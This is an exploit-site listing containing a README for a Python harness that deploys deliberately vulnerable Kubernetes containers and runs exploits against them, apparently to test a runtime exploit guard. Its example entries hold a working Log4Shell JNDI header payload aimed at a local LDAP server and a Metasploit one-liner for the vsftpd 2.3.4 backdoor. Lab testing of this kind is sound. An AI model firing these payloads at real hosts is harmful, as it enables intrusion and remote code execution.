runtime-exploit-guard CVE-2011-2523 CVE-2021-4104

Name: runtime-exploit-guard CVE-2011-2523 CVE-2021-4104
Rating: 5 (111 reviews)
2026-04-17 | CVSS 10.0
## https://sploitus.com/exploit?id=322DD1ED-D331-573E-9AAC-5B6BEC2095F9
# Container Exec - Python Script

Reads `attack-vuln-image-mapping.json`, deploys vulnerable containers via kubectl, and executes exploit commands on the host.

## Prerequisites

### System Requirements
- **Python 3.8+** (uses only standard library)
- **kubectl** — Kubernetes command-line tool
- **Metasploit Framework** — Required for FTP exploit (CVE-2011-2523)

### Installing Metasploit Framework

**Kali Linux (pre-installed):**
```bash
sudo msfupdate
```

**Ubuntu/Debian:**
```bash
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
```

**Windows:**
Download from: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

**macOS:**
```bash
brew install metasploit
```

### Verify Installation
```bash
msfconsole --version
kubectl version --client
python3 --version
```

## Usage

```bash
python container_exec.py 
```

**Example:**
```bash
python container_exec.py ../attack-vuln-image-mapping.json
```

## How It Works

For each entry in the mapping file:
1. **Deploy container** — `kubectl apply -f `
2. **Wait for pod** — `kubectl wait --for=condition=Ready`
3. **Run exploit command** — Execute on host (before/after based on `command_run`)
4. **Cleanup** — `kubectl delete -f ` after 30 seconds

## Mapping File Format

```json
{
    "entry-name": {
        "file": "vulnerable-app.yaml",
        "image": "pod-name",
        "cve": "CVE-XXXX-XXXX",
        "command_run": "after",
        "command": "exploit command to run on host"
    }
}
```

- **`file`** — YAML file in `vul-images/` directory
- **`image`** — Pod name (used for kubectl wait)
- **`cve`** — CVE identifier
- **`command_run`** — `"before"` or `"after"` (when to run the command)
- **`command`** — Shell command to execute on the host machine

## Logs

Execution logs are written to: `logs/container-exec.log`

## Examples

### Log4Shell Exploit (CVE-2021-4104)
```json
{
    "CVE-2021-4104-log4shell": {
        "file": "log4j-java-vulnerable-app.yaml",
        "image": "log4j-java-vulnerable-app",
        "cve": "CVE-2021-4104",
        "command_run": "after",
        "command": "curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'"
    }
}
```

### FTP Exploit with Metasploit (CVE-2011-2523)
```json
{
    "CVE-2011-2523-ftp-exploit": {
        "file": "ftp-exp-vulnerable-app.yml",
        "image": "ftp-exp-vulnerable-app",
        "cve": "CVE-2011-2523",
        "command_run": "after",
        "command": "msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS localhost; run; exit'"
    }
}
```

## Notes

- Update `RHOSTS` in Metasploit commands to match your target IP
- Adjust `CONTAINER_RUN_SECONDS` in the script if exploits need more time
- Ensure kubectl is configured with the correct cluster context